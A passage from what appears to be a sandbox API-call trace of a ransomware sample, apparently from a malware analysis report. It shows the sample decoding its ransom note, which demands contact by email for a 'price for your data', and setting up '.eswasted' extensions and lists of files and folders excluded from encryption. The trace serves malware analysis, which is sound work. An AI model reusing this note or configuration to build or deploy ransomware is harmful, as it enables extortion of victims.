hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f4b78 | out: hHeap=0x6d0000) returned 1 [0069.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x406) returned 0x6f4b78 [0069.739] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x120) returned 0x6f4f88 [0069.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x6f50b0 [0069.740] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6f4f88, cbMultiByte=288, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 288 [0069.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x242) returned 0x6f50e8 [0069.740] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6f4f88, cbMultiByte=288, lpWideCharStr=0x6f50e8, cchWideChar=288 | out: lpWideCharStr="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n") returned 288 [0069.740] lstrlenW (lpString="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n") returned 286 [0069.740] StrChrW (lpStart="[begin_key]*[end_key]", wMatch=0x2a) returned="*[end_key]" [0069.740] StrStrW (lpFirst="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n", lpSrch="[begin_key]*[end_key]") returned="[begin_key]*[end_key]\r\nKEEP IT\r\n" [0069.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x242) returned 0x6f5338 [0069.740] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f50e8 | out: hHeap=0x6d0000) returned 1 [0069.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f50e8 [0069.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x6f50f8 [0069.740] StrToIntExW (in: pszString="200", dwFlags=0x0, piRet=0x114ff68 | out: piRet=0x114ff68) returned 1 [0069.740] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f50f8 | out: hHeap=0x6d0000) returned 1 [0069.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ee010 [0069.740] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\lck.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x18 [0069.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x6f50f8 [0069.740] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\lck.log", lpDst=0x6f50f8, nSize=0x18 | out: lpDst="C:\\Windows\\TEMP\\lck.log") returned 0x18 [0069.740] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee010 | out: hHeap=0x6d0000) returned 1 [0069.740] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x290) returned 0x6f5588 [0069.741] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb8) returned 0x6f5130 [0069.741] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x150) returned 0x6f5820 [0069.741] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe) returned 0x6ee750 [0069.741] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f51f0 [0069.741] StrToIntExW (in: pszString="50", dwFlags=0x0, piRet=0x114fec0 | out: piRet=0x114fec0) returned 1 [0069.741] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f51f0 | out: hHeap=0x6d0000) returned 1 [0069.741] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f51f0 [0069.741] StrToIntExW (in: pszString="32", dwFlags=0x0, piRet=0x114ff3c | out: piRet=0x114ff3c) returned 1 [0069.741] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f51f0 | out: hHeap=0x6d0000) returned 1 [0069.742] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x114fe8c | out: ppstm=0x114fe8c*=0x6ee010) returned 0x0 [0069.742] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.742] lstrlenW (lpString=".eswasted_info") returned 14 [0069.742] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6edfe8*=0x2e, cb=0x1c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.742] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.742] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.742] lstrlenW (lpString=".eswasted") returned 9 [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f2ec0*=0x2e, cb=0x12, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] lstrlenW (lpString="*\\NTLDR|*\\BOOTMGR|*\\GRLDR|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe") returned 327 [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5588*=0x2a, cb=0x28e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] StrChrW (lpStart="%ProgramData%|%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0069.743] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xf [0069.743] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ee088 [0069.743] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%", lpDst=0x6ee088, nSize=0xf | out: lpDst="C:\\ProgramData") returned 0xf [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6ee088*=0x43, cb=0x1c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee088 | out: hHeap=0x6d0000) returned 1 [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] StrChrW (lpStart="%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0069.743] ExpandEnvironmentStringsW (in: lpSrc="%windir%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xb [0069.743] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6f2ee0 [0069.743] ExpandEnvironmentStringsW (in: lpSrc="%windir%", lpDst=0x6f2ee0, nSize=0xb | out: lpDst="C:\\Windows") returned 0xb [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f2ee0*=0x43, cb=0x14, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2ee0 | out: hHeap=0x6d0000) returned 1 [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] StrChrW (lpStart="%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0069.743] ExpandEnvironmentStringsW (in: lpSrc="%temp%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x10 [0069.743] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6ee088 [0069.743] ExpandEnvironmentStringsW (in: lpSrc="%temp%", lpDst=0x6ee088, nSize=0x10 | out: lpDst="C:\\Windows\\TEMP") returned 0x10 [0069.743] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6ee088*=0x43, cb=0x1e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.743] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee088 | out: hHeap=0x6d0000) returned 1 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] StrChrW (lpStart="%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0069.744] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x39 [0069.744] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x72) returned 0x6e0d78 [0069.744] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x6e0d78, nSize=0x39 | out: lpDst="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x39 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6e0d78*=0x43, cb=0x70, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e0d78 | out: hHeap=0x6d0000) returned 1 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] StrChrW (lpStart="C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Program Files|C:\\Program Files (x86)" [0069.744] ExpandEnvironmentStringsW (in: lpSrc="C:\\Recovery", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xc [0069.744] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6f2ee0 [0069.744] ExpandEnvironmentStringsW (in: lpSrc="C:\\Recovery", lpDst=0x6f2ee0, nSize=0xc | out: lpDst="C:\\Recovery") returned 0xc [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f2ee0*=0x43, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2ee0 | out: hHeap=0x6d0000) returned 1 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] StrChrW (lpStart="C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Program Files (x86)" [0069.744] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x11 [0069.744] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x22) returned 0x6f5218 [0069.744] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files", lpDst=0x6f5218, nSize=0x11 | out: lpDst="C:\\Program Files") returned 0x11 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5218*=0x43, cb=0x20, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5218 | out: hHeap=0x6d0000) returned 1 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.744] StrChrW (lpStart="C:\\Program Files (x86)", wMatch=0x7c) returned 0x0 [0069.744] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x17 [0069.744] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2e) returned 0x6f5218 [0069.744] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)", lpDst=0x6f5218, nSize=0x17 | out: lpDst="C:\\Program Files (x86)") returned 0x17 [0069.744] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5218*=0x43, cb=0x2c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5218 | out: hHeap=0x6d0000) returned 1 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] StrChrW (lpStart="bin|Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.745] lstrlenW (lpString="bin") returned 3 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5820*=0x62, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] StrChrW (lpStart="Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.745] lstrlenW (lpString="Boot") returned 4 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5828*=0x42, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] StrChrW (lpStart="boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.745] lstrlenW (lpString="boot") returned 4 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5832*=0x62, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] StrChrW (lpStart="dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.745] lstrlenW (lpString="dev") returned 3 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f583c*=0x64, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.745] StrChrW (lpStart="etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.746] lstrlenW (lpString="etc") returned 3 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5844*=0x65, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] StrChrW (lpStart="lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.746] lstrlenW (lpString="lib") returned 3 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f584c*=0x6c, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] StrChrW (lpStart="initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.746] lstrlenW (lpString="initdr") returned 6 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5854*=0x69, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] StrChrW (lpStart="sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.746] lstrlenW (lpString="sbin") returned 4 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x6f5862*=0x73, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, pv=0x114fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.746] ISequentialStream:RemoteWrite (in: This=0x6ee010, 